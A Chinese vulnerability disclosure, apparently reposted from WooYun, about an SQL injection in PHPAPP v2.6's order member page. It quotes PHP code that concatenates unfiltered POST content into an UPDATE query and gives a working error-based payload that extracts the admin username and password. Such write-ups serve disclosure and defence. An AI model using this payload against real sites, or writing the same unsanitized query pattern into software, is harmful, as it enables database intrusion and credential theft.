### 簡(jiǎn)要描述：

PHPAPP注入第十枚(未過濾)

### 詳細(xì)說明：

在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官網(wǎng)看了看，前幾天剛有更新，就在官網(wǎng)下了PHPAPP最新的v2.6來看看(2014-12-11更新的)。

PSOT注入點(diǎn)：wwww.xxx.com/member.php?app=48&op=4&action=1, 存在漏洞的文件在/phpapp/apps/order/member_phpapp.php

隨意注冊(cè)個(gè)賬號(hào)即可測(cè)試

來看看漏洞是如何產(chǎn)生的/phpapp/apps/order/member_phpapp.php

```

if($this->GET['op']==4){

if($this->POST['Submit']){

$content=$this->POST['content'];

$oid=intval($oderid);

$this->Update('task_order',array('content'=>$content),array()," WHERE oid='$oid'");

//文件

$files=$this->UploadFile();

if($files){

foreach($files as $fid){

$this->Insert('apps_file',array('appid'=>$this->app,'fid'=>$fid,'uid'=>$this->uid,'id'=>$oid,'type'=>3),array());

}

$this->ReplaceFileContent($files,'task_order',$content," WHERE oid='$oid' ");

}

echo '上傳成功！';

echo $this->CloseNowWindows('#loading',1);

}

}

```

用戶提交的content 沒有經(jīng)過過濾，拼接了sql語(yǔ)句，造成了注入。

Phpapp可以顯錯(cuò)，那就用error-based blind進(jìn)行注入。

Pyload：(POST提交)

```

Submit=1&content=1' or (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,username,0x23,password) from phpapp_member limit 0,1))a from phpapp_member group by a)b) or'

```

注入成功，管理員用戶名及密碼如下圖中所示：

[](https://images.seebug.org/upload/201412/23235747caddfdfa3a066964a8ef3c61532fad5c.jpg)

### 漏洞證明：

見 詳細(xì)說明

總結(jié)

以上是生活随笔為你收集整理的php member limit,PHPAPP注入第十枚（未过滤）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。